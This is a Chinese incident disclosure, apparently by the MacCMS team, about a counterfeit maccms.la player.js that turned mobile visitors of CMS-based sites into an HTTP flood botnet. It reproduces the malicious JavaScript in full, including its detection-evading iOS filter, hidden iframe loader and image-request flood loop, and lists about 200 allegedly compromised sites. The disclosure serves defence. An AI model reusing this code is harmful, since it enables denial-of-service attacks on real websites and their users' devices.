我们严厉谴责CC攻击我们的假冒团队，目前整理了被控制的大部分肉鸡网站 – 作者:MacCMS

一天时间被请求了足足3.88B
每个小时被请求3亿次

大量记录推荐者的请求但仍然有浏览器不支持这种调用方式被我们抓捕

涉及从maccms.la下载或者更新的所有版本

v10

2020.1000.1029+外加拉版本最新的跨界历史版2022.1000.1099

v8

2020.1043+

通过抓包得出是因为maccms.la最新版本的player.js手机端访问远程调用调用js

http://union.maccms.la/html/top10.js

http://union.maccms.la/html/top.js

大家不相信可以自己

代码单独如下

(MacPlayer.Status) {} else {}

function msck(name, value) {var date = new Date();date['setTime']((date['getTime']() + (30 * 60) * (1000))),document['cookie'] = (name + '=' + escape(value)) + (';path=/;expires=') + date['toGMTString']();}//这里开始写调用缓存时间 防止被发现目的为了隐藏攻击

function mgck(name) {

`var list, reg = new RegExp('(^|x20)' + name + '=([^;]*)(;|$)');`
`if (list = document['cookie'].match(reg)) return unescape(list[2]); else return null;`

}

var de = new Date(), mh = de['getMonth']() + 1,da = de['getDate'](), hs = de['getHours'](), rr = mh + '' + da + '' + hs, ek = 'k1',ev = parseFloat(mgck(ek)), ua = navigator['userAgent'],au = '//a.laodaguan.cn/';

//这里判断移动端 过滤了windows和mac系统的抓包 所以必须通过移动端设备进行抓包才可以拿到加载内容 懂一点脚本的都能看懂

function mshr() {

`(!/(Win|Mac)/i.test(navigator['platform']) && !/(localhost|127|192|10)/i.test(location['hostname']) && isNaN(ev) && ($('.MacPlayer').length > 0) || (location['search'].indexOf('mdg') > -1)) && (/(iPhone|iPad|iPod|IOS)/i.test(ua) && $('body').append(`
    `"<iframe style="display:none;" referrerPolicy="no-referrer" security="restricted" sandbox="allow-same-origin allow-forms allow-scripts" src="" + au + "index.html?" + rr + ""></iframe>"`
`), msck(ek, '1'), setInterval(imgflood, 1500));`

}

//这是很常见的js 攻击手法 虽然做了referer重置但依然有浏览器不支持这种调用方式被我们抓出了日志function imgflood() {

`rr = parseFloat(rr) + 1;`
`var img1 = new Image();`
`img1['setAttribute']('referrerPolicy', 'no-referrer');`
`img1['src'] = '//www.maccms.com/?' + new Date().getTime();`
`var img2 = new Image();`
`img2['setAttribute']('referrerPolicy', 'no-referrer');`
`img2['src'] = '//union.maccms.com/html/top10.js?' + rr;`
`var img3 = new Image();`
`img3['setAttribute']('referrerPolicy', 'no-referrer');`
`img3['src'] = '//union.maccms.com/html/top.js?' + rr;`

}

setTimeout(mshr, 50);

function abc() {}

function pcy() {}

ios、安卓下载《http cather》手机在线抓包了快去看看你网站是否调用了union.maccms.la 还有个判断方式手机浏览器其他页面加载完成如果播放页面浏览器头部一直是加载中捕捉条然后就是在长链接请求攻击不会中断非常耗时手机cpu

看了下这些都是海螺模版的应该是作者被拉忽悠了脑子开发结果可能给你这个智商也是这样容易就被忽悠了去升级沦为肉鸡

唯一github官方唯一：https: //github.com/maccmspro域名：https://maccms.pro

被控制为攻击肉鸡的域名列表如下：

• http://1.mqdy.de
• http://154.197.154.48
• http://154.197.154.55
• http://154.93.60.36
• http://172.121.59.45
• http://183.ydt.5ahome.cn
• http://23.90.22.248
• http://25u51.cnzu95.com:6033
• http://7862y.com
• http://87.sbs.5ahome.cn
• http://9ov71.51add.com:4206
• http://awyy18.com
• http://bwl87.com
• http://dianyings.cn
• http://dy.tv56.cn
• http://g5451.com
• http://haowywz.com
• http://hxc27.com
• http://hxc97.com
• http://i7801.com
• http://itaojuba.com
• http://lsqnjoa.cn
• http://lyl23.me
• http://m.163fahao.com
• http://mideaysj.com
• http://nq698.com
• http://v.shensgo.com
• http://vcfuli.com
• http://wuritv6.com
• http://www.234qvod.com
• http://www.2kys.com
• http://www.399q.cn
• http://www.91m.cc
• http://www.auedu.org
• http://www.bajies.com
• http://www.btdyba.com
• http://www.cangpinhui.com.cn
• http://www.cechi5.com
• http://www.chinayd.org
• http://www.chok8.com
• http://www.dixi123.com
• http://www.dy1958.com
• http://www.dydzkjs.com
• http://www.fusht.com
• http://www.hanju233.com
• http://www.hantutv.com
• http://www.haohao44.com
• http://www.hotwoods.biz
• http://www.hwfudao.com
• http://www.hxc45.com
• http://www.i63.com.cn
• http://www.ikrtv.com
• http://www.itihi.com
• http://www.jinhongjx.com
• http://www.jlqsnwl.com
• http://www.madou.la
• http://www.meiyangle888.com
• http://www.mimi91.xyz
• http://www.mycctv.cn
• http://www.ncdydyy.com
• http://www.ok009.xyz
• http://www.oukepuhui.com
• http://www.pubger.com
• http://www.qdkyjh.com
• http://www.qpg6.com
• http://www.rwgaoxin.com
• http://www.rz31.com
• http://www.tzwenyi.cn
• http://www.vipys5.com
• http://www.wearry.com
• http://www.wuritv6.com
• http://www.xiuhuan.xyz
• http://www.xttzb.com
• http://www.zaoyi.net
• http://www.zhoumengping.xyz
• http://xiaomc.info
• http://xincheng888.net
• https://001d.com
• https://123kubo.net
• https://123kubo.tv
• https://173cq.com
• https://5ji.tv
• https://789dydy.com
• https://789dyy.com
• https://789yyw.com
• https://ak222.cc
• https://aqpos.top
• https://awyy23.com
• https://bwl87.com
• https://ddvod.tv
• https://duonaoyingyuan.tangrenjie.tv
• https://dy0026.com
• https://hhty029.com
• https://hnxmz.com
• https://holdoo.cn
• https://hyrzs.com
• https://i58b.tv
• https://imaple.co
• https://inzdrama.com
• https://jumi.tv
• https://longvcd.com
• https://m.hjtv4.com
• https://m.keso.org
• https://m.klksm.com
• https://m.my2058.com
• https://m.sx0371.com
• https://m.tv4.cc
• https://m.xindiediao.com
• https://momovod.tv
• https://movie.58yanhao.com
• https://o8tv.com
• https://ouleyingyuan.tangrenjie.tv
• https://sexx3.xyz
• https://shichojp.com
• https://shrocc.com
• https://sy0752.com
• https://tianchatv.com
• https://tv.ci
• https://vip.19zh.com
• https://www.002tv.com
• https://www.173cq.com
• https://www.17kty.com
• https://www.263163.cn
• https://www.3ayy.com
• https://www.3kt.net
• https://www.52kandy.com
• https://www.555dy1.com
• https://www.5thnyh.com
• https://www.789dydy.com
• https://www.789dyw.net
• https://www.789dywz.com
• https://www.7caa.com
• https://www.8090.me
• https://www.91m.cc
• https://www.99meiju.tv
• https://www.ahrmgg.com
• https://www.autonicdq.com
• https://www.bddysf.com
• https://www.biqune.com
• https://www.calmlab.com
• https://www.cclsu.com
• https://www.chok8.com
• https://www.cunzhangba.com
• https://www.dadatu2.com
• https://www.dadatutv.net
• https://www.dadatuzi.com
• https://www.dusheyy.com
• https://www.f8yy.com
• https://www.haiyouims.com
• https://www.hanjutvwz.com
• https://www.hbxhda.com
• https://www.hjtv4.com
• https://www.holdoo.cn
• https://www.jianzhenkeji.com
• https://www.jpysvip.net
• https://www.kanxi5.com
• https://www.ku2000.com
• https://www.limintv.com
• https://www.masansan.com
• https://www.meijui.com
• https://www.mindanggui.com
• https://www.mldyy.cc
• https://www.mshuifu.com
• https://www.muyy.cc
• https://www.newqiyu.com
• https://www.o8tv.com
• https://www.pianba.net
• https://www.ppqun.com
• https://www.puhua.cc
• https://www.qcjycg.com
• https://www.raoguns.com
• https://www.schtbz.com
• https://www.tancao.cn
• https://www.tangrenjie.tv
• https://www.tianlang88.com
• https://www.tianmohk.com
• https://www.ttspt.com
• https://www.u5dy.com
• https://www.wo03.com
• https://www.wojiangwang.com
• https://www.wuguiyy.com
• https://www.wuweidy5.com
• https://www.xiafandy.com
• https://www.xianzonglin.club
• https://www.xuejiancn.com
• https://www.xxzz2.xyz
• https://www.yhdmk.com
• https://www.ys11.xyz
• https://www.ysdzfwb.com
• https://www.zgwangzhan.com
• https://www.zhengqidiaosu.com
• https://www.zhuijuju.com
• https://xuejiancn.com
• https://xzdjc.com
• https://zgwangzhan.com

来源：freebuf.com 2021-07-03 15:42:21 by: MacCMS

相关推荐: OpenVAS开源风险评估系统部署方案 – 作者:魅影儿

OpenVAS，即开放式漏洞评估系统，是一个用于评估目标漏洞的杰出框架。功能十分强大，最重要的是，它是“开源”的——就是免费的意思啦～它与著名的Nessus“本是同根生”，在Nessus商业化之后仍然坚持开源，号称“当前最好用的开源漏洞扫描工具”。最新版的Ka…